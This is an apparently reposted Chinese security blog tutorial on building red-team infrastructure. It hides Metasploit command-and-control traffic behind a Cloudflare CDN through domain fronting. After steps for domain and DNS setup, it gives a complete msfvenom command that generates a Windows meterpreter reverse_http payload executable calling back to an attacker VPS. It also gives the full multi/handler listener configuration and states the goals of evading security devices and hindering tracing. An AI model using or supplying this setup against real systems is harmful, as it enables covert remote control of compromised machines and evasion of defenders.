技术干货 | Metasploit 红队基础设施建设

  • A+
所属分类:安全文章

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:asj-jacky

加入安世加 交流群 和大佬们一起交流安全技术

0x01 前言

停更了一小段时间,去备战月考了!这几天看了一篇关于Metasploit文章,发现好多红队基础设施建设都是关于CobaltStrike 其实Metasploit也可以域前置

0x02 概括

  • 攻击流量通过CDN节点将流量转发到真实的C2服务器
  • CDN节点ip通过识别请求的Host头进行流量转
  • 可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上

0x03 准备

域名申请地址:https://www.godaddy.com/

技术干货 | Metasploit 红队基础设施建设

我自己是用这个平台注册的,但是是需要付费的

技术干货 | Metasploit 红队基础设施建设

免费CDN

申请地址:https://dash.cloudflare.com/

登陆CDN,添加站点为刚刚申请的域名

技术干货 | Metasploit 红队基础设施建设

添加A记录,指向VPS的IP地址

技术干货 | Metasploit 红队基础设施建设
技术干货 | Metasploit 红队基础设施建设
技术干货 | Metasploit 红队基础设施建设

配置好后,返回cdn平台 为了实时受到我们的命令的响应:我们需要修改缓存规则:

技术干货 | Metasploit 红队基础设施建设
技术干货 | Metasploit 红队基础设施建设

0x04 域前置

msfvenom -p windows/meterpreter/reverse_http LHOST=服务器IP LPORT=80 HttpHostHeader=域名 -f exe -o ~/payload.exe

LHOST: VPS上架一个Metasploit然后输入VPS的IP地址

LPORT: http 协议的 payload,访问域名的 80 端口

HttpHostHeader: 使用我们进行域前置攻击的域名,能够把流量转回到我们自己的服务器

Metasploit监听器

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST VPS IP
lhost => VPS IP
msf5 exploit(multi/handler) > set LPORT 80
lport => 80
msf5 exploit(multi/handler) > set HttpHostHeader 域名
HttpHostHeader => 域名
msf5 exploit(multi/handler) > set OverrideRequestHost true
OverrideRequestHost => true
msf5 exploit(multi/handler) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf5 exploit(multi/handler) > run

0x05 效果

技术干货 | Metasploit 红队基础设施建设

技术干货 | Metasploit 红队基础设施建设

原文始发于微信公众号(安世加):技术干货 | Metasploit 红队基础设施建设

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: